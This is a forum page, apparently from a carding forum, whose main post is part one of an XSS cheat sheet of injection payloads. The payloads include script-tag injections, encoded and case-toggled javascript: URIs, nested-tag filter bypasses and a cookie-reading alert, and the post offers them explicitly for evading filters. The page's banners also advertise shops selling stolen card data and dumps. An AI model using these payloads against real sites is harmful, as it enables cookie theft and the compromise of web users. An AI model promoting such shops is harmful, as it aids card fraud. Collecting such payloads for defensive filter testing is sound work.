Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
adv ex on 5 january 2024
adv ex on 22 February 2024
banner Expire 26 October 2024
Rescator cvv and dump shop
banner expire at 13 May

Yale lodge shop
UniCvv
banner Expire 1 April 2021

Complete Cross site Scripting(XSS) cheat sheets : Part 1

Premiums

Premiums

TRUSTED VENDOR
Joined
Dec 5, 2020
Messages
1,356
We are producing this XSS Cheat sheet after collecting the codes from hackers’ techniques and different sites especially http://ha.ckers.org/xss.html . This is complete list of XSS cheat codes which will help you to test xss vulnerabilities ,useful for bypassing the filters. If you have any different cheat codes , please send your code.


Basic XSS codes:
———————————-

<script>alert(“XSS”)</script>
Click to expand...


<script>alert(“XSS”);</script>
Click to expand...


<script>alert(‘XSS’)</script>
Click to expand...


“><script>alert(“XSS”)</script>
Click to expand...


<script>alert(/XSS”)</script>
Click to expand...


<script>alert(/XSS/)</script>
Click to expand...
When inside Script tag:
———————————

</script><script>alert(1)</script>
‘; alert(1);
‘)alert(1);//
Click to expand...
Bypassing with toggle case:
————————————–

<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(‘XSS’)>
Click to expand...
XSS in Image and HTML tags:
———————————————

<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert(‘XSS’)>
Click to expand...


<img src=xss onerror=alert(1)>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
Click to expand...


<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
Click to expand...


<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
Click to expand...


<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
Click to expand...


<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Click to expand...


<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
Click to expand...


<BODY ONLOAD=alert(‘XSS’)>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=”javascript:alert(‘XSS’)”
Click to expand...


<iframe src=http://ha.ckers.org/scriptlet.html <
Click to expand...
Bypass the script tag filtering:
————————————————–

<<SCRIPT>alert(“XSS”);//<</SCRIPT>
Click to expand...


%253cscript%253ealert(1)%253c/script%253e
Click to expand...


“><s”%2b”cript>alert(document.cookie)</script>
Click to expand...


foo<script>alert(1)</script>
Click to expand...


<scr<script>ipt>alert(1)</scr</script>ipt>
Click to expand...
Using String.fromCharCode function:
—————————————————–

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
Click to expand...


‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Click to expand...
You can combine the above mentioned codes and make your own cheat code.

Note:
We are extending the cheat sheet. Soon we will publish the part 2.
 
You must log in or register to reply here.

Online statistics

Members online
3
Guests online
219
Total visitors
222
Totals may include hidden visitors.

Latest posts

Newest members

Stay Connected

Top Bottom